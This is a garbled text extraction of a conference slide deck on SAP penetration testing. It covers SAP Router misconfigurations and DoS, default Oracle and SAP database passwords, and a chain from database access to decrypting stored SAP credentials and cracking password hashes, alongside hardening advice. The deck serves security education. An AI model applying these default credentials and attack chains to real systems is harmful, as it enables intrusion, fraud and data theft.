Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’...
Transcript of Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’...
![Page 1: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/1.jpg)
Invest in security to secure investments
Prac%cal SAP Pentes%ng
Alexander Polyakov. CTO ERPScan
![Page 2: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/2.jpg)
About ERPScan
• The only 360-‐degree SAP Security soluAon -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta%ons key security conferences worldwide • 25 Awards and nomina%ons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
![Page 3: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/3.jpg)
3
Introduc)on to SAP
![Page 4: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/4.jpg)
Business applica%on security
All business processes are generally contained in ERP systems. Any informaAon an aPacker, be it a cybercriminal, industrial spy
or compeAtor, might want is stored in a company’s ERP. This informaAon can include financial, customer or public
relaAons, intellectual property, personally idenAfiable informaAon and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effecAve if targeted at a vicAms ERP
system and cause significant damage to the business.
4
![Page 5: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/5.jpg)
Big companies
5
Portal
HR LogisAcs
Warehouse
ERP
Billing
Suppliers Customers
Banks Insurance Partners
Branches
BI
Industry
CRM
SRM
![Page 6: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/6.jpg)
SAP
Вставьте рисунок на слайд, скруглите верхний левый и нижний правый угол (Формат – Формат рисунка), добавьте контур (оранжевый, толщина – 3)
6
• The most popular business applicaAon • More than 250000 customers worldwide • 83% Forbes 500 companies run SAP • Main system – ERP • 3 Main plaxorms
- NetWeaver ABAP - NetWeaver J2EE - BusinessObjects
![Page 7: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/7.jpg)
SAP NetWeaver ABAP
• Main plaxorm
• Base plaxorm for: ERP,SRC,CRM,PLM
• Purpose: Automate business processes
• If compromised: - Stopping of business processes - Fraud - Industrial espionage
7
![Page 8: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/8.jpg)
SAP NetWeaver J2EE
• AddiAonal plaxorm
• Base plaxorm for IT stuff. Like: – SAP Portal , SAP XI, SAP SoluAon Manager, SAP Mobile, SAP xMII
• Purpose: IntegraAon of different systems
• If compromised: - Stopping of all connected business processes - Fraud - Industrial espionage
8
![Page 9: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/9.jpg)
SAP BusinessObjects
• AddiAonal plaxorm
• Base plaxorm for analyAcs
• Mostly business oriented: - Business Intelligence - GRC
• If compromised: - Fraud - Industrial espionage
9
![Page 10: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/10.jpg)
10
Introduc)on to SAP
![Page 11: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/11.jpg)
SAP for users
• Client-‐server applicaAon SAP-‐GUI with proprietary DIAG protocol
• Main funcAons – TransacAons executed in SAPGUI
• Also possible to call special background funcAons (RFC) remotely
• Possible to modify code of transacAons or RFC funcAons using ABAP language
• Possible to use web-‐interfaces like Webdynpro or BSP in some applicaAons like SRM
11
![Page 12: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/12.jpg)
SAP for users
• SAP Landscape – Test, Development, ProducAon, QA
• SAP Instance – Server Instance, Dialog instance
• Client – Default clients – Client separaAon
12
![Page 13: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/13.jpg)
13
DEMO 0: Login to SAP system.
![Page 14: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/14.jpg)
14
Introduc)on to SAP Security
![Page 15: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/15.jpg)
SAP Security
• Complexity. Complexity kills security. Many different
vulnerabiliAes in all levels from network to applicaAon • Customiza%on. Can not be installed out of the box. They have
many (up to 50%) custom codes and business logic • Risky. Rarely updated because administrators are scared they
can be broken during updates and also it is downAme • Unknown. Mostly available inside a company (closed world)
hPp://erpscan.com/wp-‐content/uploads/pres/ForgoPen%20World%20-‐%20Corporate%20Business%20ApplicaAon%20Systems%20Whitepaper.pdf
15
![Page 16: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/16.jpg)
16
0
100
200
300
400
500
600
700
800
900
2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014
By 2014 -‐ 2800 SAP Security notes
SAP Security notes
![Page 17: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/17.jpg)
SAP Pentes%ng Features
• Deeper knowledge of ERP than normal systems required • ERP systems are mission criAcal and cannot be accidentally
taken down (POC exploits too dangerous) • Gaining shell / command exec is not the goal
– Goal is access to sensiAve data or impact to business processes
17
![Page 18: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/18.jpg)
SAP Pentes%ng Features: deeper knowledge
• Higher difficulty than standard pen tests • Required knowledge of:
– Business processes – Business logic – Exploit tesAng impact risk assessment – High end databases – Numerous (someAmes esoteric) operaAng systems – Different hardware plaxorms – Common custom implementaAons
18
![Page 19: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/19.jpg)
SAP Pentes%ng Features : Exploita%on
• Exploit code for ERP not easy to develop • Payloads have to be adapted
– Numerous hardware, OS, release version, and db systems to generate payloads for
– In some causes up to 50 different shellcode variaAons
• Building a test environment nearly impossible – Takes an expert a week to properly install each variaAon – A year to build a comprehensive test environment
19
![Page 20: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/20.jpg)
SAP Pentes%ng Features : Shell
• A bePer approach required with focus on – Architecture – Business Logic – ConfiguraAon – You will get administrators access to business data
• Rather than – Program or Memory VulnerabiliAes – You will probably gain access to OS and then need to obtain access to
ApplicaAon
20
![Page 21: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/21.jpg)
SAP Security areas
21
Code security
Business security (SOD)
Infrastructure security (Network,OS,Database)
ApplicaAon plaxorm security
Legal user required
Legal user not required
![Page 22: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/22.jpg)
SAP Security areas
22
Code security
Business security (SOD)
Infrastructure security (Network,OS,Database)
ApplicaAon plaxorm security
Legal user required
Legal user not required
![Page 23: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/23.jpg)
Methodologies: EAS-‐SEC
23
• Enterprise ApplicaAon Security Project • Found in 2010 • Published concept and top10 issues for different areas • Version 2 in 2004 Published compliance for SAP NetWeaver ABAP hPp://erpscan.com/publicaAons/the-‐sap-‐netweaver-‐abap-‐plaxorm-‐vulnerability-‐assessment-‐guide/ Exists to provide guidance to people involved in the procurement, design, implementa)on or sign-‐off of large scale (i.e.'Enterprise') applica)ons. hPp://www.owasp.org/index.php/OWASP_Enterprise_ApplicaAon_Security_Project
![Page 24: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/24.jpg)
24
Network level security
![Page 25: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/25.jpg)
Network Security Agenda
Top 10 Network/Architecture issues by EAS-‐SEC 1. Lack of proper network filtra%on between SAP and Corporate
network 2. Lack or vulnerable encryp%on between corporate network and
SAP 3. Lack of separa%on between TST DEV and PRD system 4. Lack of encrypAon inside SAP Network 5. Insecure trusted relaAons between components 6. Insecure configured Internet facing applica%ons 7. Vulnerable / default configured Gateways 8. lack of frontend access filtraAon 9. Lack or misconfigured monitoring IDS/IPS 10. Insecure / inappropriate wireless communicaAon
25
![Page 26: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/26.jpg)
Network Security at glance
It is mostly about:
• Network filtraAon (ACL) • Protocol security (EncrypAon) • Securing Internet access (SAP Router)
26
![Page 27: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/27.jpg)
Network filtra%on
27
Almost every listed applicaAon have vulnerabiliAes and misconfiguraAons that can be used to gain access to SAP
hPp://www.sdn.sap.com/irj/scn/go/portal/prtroot/docs/library/uuid/4e515a43-‐0e01-‐0010-‐2da1-‐9bcc452c280b?QuickLink=index&overridelayout=true
![Page 28: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/28.jpg)
28
DEMO 1: Nmap scan of SAP
![Page 29: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/29.jpg)
Why cri%cal?
• AdministraAve SAP services can have direct Internet access • Even if you sure that not • To prove in we run “SAP Security in Figures report” • All of possible services were found at least once
29
Myth: SAP systems a`acks available only for insiders
![Page 30: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/30.jpg)
Why cri%cal?
30
About 10000 systems including: Dispatcher, Message server, SapHostcontrol, Web-‐ services
![Page 31: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/31.jpg)
Protocol security
31
Soa Port Protocol Pass encr Data encr Mi%ga%on
SAPGUI 32<SN> DIAG Compession (can be decompresssed)
Compression (can be decompressed)
SNC
WEBGUI 80<SN> HTTP Base64 no SSL
RFC 33<SN> RFC XOR no SNC
Message server 36<SN> No no SNC
Visual Admin 5<SN>04 P4 Prorietary (broken) Prorietary (broken)
SSL
IIOP 5<SN>07
J2EE Telnet 5<SN>08 No No VPN/Disablse
LogViewer 5<SN>09 prorietary md5 No NO
MMC 5<SN>13 HTTP Base64 no SSL
![Page 32: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/32.jpg)
32
SAP Router security
![Page 33: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/33.jpg)
SAP Router
SAP Router – reverse proxy server:
• Transmit connecAons – From internet lo company
– From SAP AG to company
– Between networks – Between clients/partners
• Listen by default port 3299 • Can be installed in windows/linux • Support encrypAon (SNC) and ACL
33
![Page 34: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/34.jpg)
SAP Router bug 1 (Table bypass)
There is an ACL table to prevent unauthorized access
• D 172.16.0.1 192.168.1.1 22 • P 172.16.0.4 192.168.1.1 3301 passwd • S 172.16.0.5 192.168.1.1 * passwd • . • . • . • KP * 192.168.1.1 8000 • P * * *
34
![Page 35: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/35.jpg)
SAP Router bug 2 (non SAP services)
• SomeAmes administrators use SAPRouter also for rouAng other protocols
• It is possible to connect any port • In old versions * means any port is allowed • In new versions * means any SAP port is allowed
• P 172.*.*.* * 3389 • P * * telnet
35
![Page 36: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/36.jpg)
SAP Router bug 3
• InformaAon disclose about router table • If router configured with special parameter -‐i • Router table can be remotely disclosed • In real world ~20% of routers configured in such way
36
![Page 37: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/37.jpg)
SAP Router bug 4 (DOS)
• If you found informaAon disclose • Or brute for at least one service which can be accessed thought
SAP Router • You can run DOS aPack on SAP Router • By default router pool limited to 3000 connecAons • In 1 minute you can disable SAPRouter
37
![Page 38: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/38.jpg)
SAP Router bug 5 (full access)
• Auth bypass • If router configured with special parameter -‐x • Router can be remotely reconfigured • In real world ~8% of routers configured in such way!
38
![Page 39: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/39.jpg)
SAP Router bug 6 (Memory corrup%on)
• Memory corrupAon issue were found by ERPScan team • Remote compromise without authenAcaAon • Cant disclose details now • 85% vulnerable NOW!
39
![Page 40: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/40.jpg)
40
Database level security for SAP systems
![Page 41: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/41.jpg)
Database Security Agenda
• CriAcal database data • APacking Database • From database to SAP • Securing Database
41
![Page 42: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/42.jpg)
Cri%cal database data
• We are interested in data that can help us to get into SAP • Data stored in tablespace SAPR3 or SAP<SID> • InteresAng tables: USR02 — password hashes
SSF_PSE_D — SSO keys
RFCDES – passwords for RFC connecAons
ICFSERVLOC – passwords for ICF services
REPOSRC – ABAP programs
42
![Page 43: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/43.jpg)
A`acking Database (OWASP-‐EAS)
Top 10 OS Issues by OWASP-‐EAS 1 Default passwords for DB access 2 Lack of DB patch management 3 Unnecessary Enabled DB features 4 lack of password lockout/complexity checks 5 Unencrypted sensiAve data transport / data 6 Lack or misconfigured network access control 7 Extensive user and group privileges 8 lack or misconfigured audit 9 Insecure trust rela%ons 10 Open addiAonal interfaces
43
SAP Specific
SAP Specific
SAP Specific
![Page 44: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/44.jpg)
A`acking Database (OWASP-‐EAS)
• Oracle is sAll most popular database for SAP • By default listen port 1527 • Common aPacks:
– Default Oracle passwords – Simple passwords bruteforce – Protocol vulnerabiliAes (overflows) – Listener aPacks (remote registraAon of log)
44
Direct access to Database = full SAP compromise
![Page 45: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/45.jpg)
Default passwords
• Default SAP’s database users/passwords – SAPR3/SAP
• Default Oracle database users/passwords – SYS/CHANGE_ON_INSTALL – SYSTEM/MANAGER – SCOTT/TIGER – DBSNMP/DBSNMP
45
![Page 46: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/46.jpg)
Misconfigured access control
• Oracle configuraAon REMOTE_OS_AUTHENT • If set to TRUE oracle trusts remote system for connecAng to
listener • Remote user must have <SID>ADM name • No need for password or anything else!
46
![Page 47: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/47.jpg)
Misconfigured access control
47
![Page 48: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/48.jpg)
From database to SAP
• Connect using OPS$<SID>ADM • Select encrypted password from SAPUSER table • Decrypt it (DES with known key BE_HAPPY) • Connect to SAP using user SAPR3/SAPSR3/SAPSR3DB • SelecAng user hashes from SAP<SID>.usr02 table • Brute hashes using JohnTheRipper
48
![Page 49: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/49.jpg)
Oracle Security Defense
• Close port 1527 from everything but SAP • Secure listener by password • Configure password policies
– FAILED_LOGIN_ATTEMPTS – PASSWORD_VERIFY_FUNCTION
• Change default passwords • Encrypt data transfer • Enable SQL Audit at DB
49
![Page 50: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/50.jpg)
50
SAP Applica)on plaMorm security
![Page 51: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/51.jpg)
SAP NetWeaver
51
![Page 52: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/52.jpg)
52
SAP Frontend security
![Page 53: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/53.jpg)
Why A`ack users
• Users are less secure • There are thousands SAP users in one company
• You can aPack them even if Server is fully secured
• You can aPack them from outside • You can use them as proxy for aPacking servers
53
![Page 54: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/54.jpg)
Typical Client Soaware for SAP
• SAPGUI • JAVAGUI • WEBGUI
• NWBC • RFC • ApplicaAons such as VisualAdmin, Mobile client and many-‐many
other
54
![Page 55: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/55.jpg)
Typical Client Soaware for SAP
55
Date Vulnerable Component Author Vulnerability Link
04.01.2007 Rfcguisink Mark Litchfield BOF hPp://www.ngsso�ware.com/advisories/high-‐risk-‐vulnerability-‐in-‐enjoysap-‐stack-‐overflow/
04.01.2007 Kwedit Mark Litchfield BOF hPp://www.ngsso�ware.com/advisories/high-‐risk-‐vulnerability-‐in-‐enjoysap-‐stack-‐overflow/
07.11.2008 Mdrmsap Will Dormann BOF hPp://www.securityfocus.com/bid/32186/info 07.01.2009 Sizerone Carsten Eiram BOF hPp://www.securityfocus.com/bid/33148/info 31.03.2009 WebWiewer3D Will Dormann BOF hPp://www.securityfocus.com/bid/34310/info 15.04.2009 Kwedit Carsten Eiram Insecure Method hPp://secunia.com/secunia_research/2008-‐56/ 08.06.2009 Sapirrfc Alexander Polyakov (DSecRG) BOF hPp://dsecrg.com/pages/vul/show.php?id=115
28.09.2009 WebWiewer3D Alexander Polyakov (DSecRG) Insecure Method hPp://dsecrg.com/pages/vul/show.php?id=143
28.09.2009 WebWiewer2D Alexander Polyakov (DSecRG) Insecure Method hPp://dsecrg.com/pages/vul/show.php?id=144
07.10.2009 VxFlexgrid Elazar Broad , Alexander Polyakov (DSecRG) BOF hPp://dsecrg.com/pages/vul/show.php?id=117
23.03.2010 BExGlobal Alexey Sintsov (DSecRG) Insecure Method hPp://dsecrg.com/pages/vul/show.php?id=164
unpublished Kwedit
Alexander Polyakov, Alexey Troshichev (DSecRG)
Insecure Method hPp://dsecrg.com/pages/vul/show.php?id=145
14.12.2010
RFCSDK Alexey Sintsov (DSecRG) Memory CorrupAon hPp://dsecrg.com/pages/vul/show.php?id=169
14.12.2010 RFCSDK Alexey Sintsov (DSecRG) Format String hPp://dsecrg.com/pages/vul/show.php?id=170
unpublished
DSECRG-‐00173 Alexander Polyakov (DSecRG) Insecure Method later
22.12.2010 NWBC Alexey Sintsov (DSecRG) Memory CorrupAon hPp://dsecrg.com/pages/vul/show.php?id=210
![Page 56: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/56.jpg)
Implementa%on fails
• DistribuAves usually stored on shared folder • If you can gain this access it is possible to overwrite dll’s • Or modify configuraAon file with BOF issues.
• Or overwrite configuraAon files with fake SAP server
56
![Page 57: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/57.jpg)
57
SAP NetWeaver – Applica)on server services
![Page 58: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/58.jpg)
SAP NetWeaver: main components
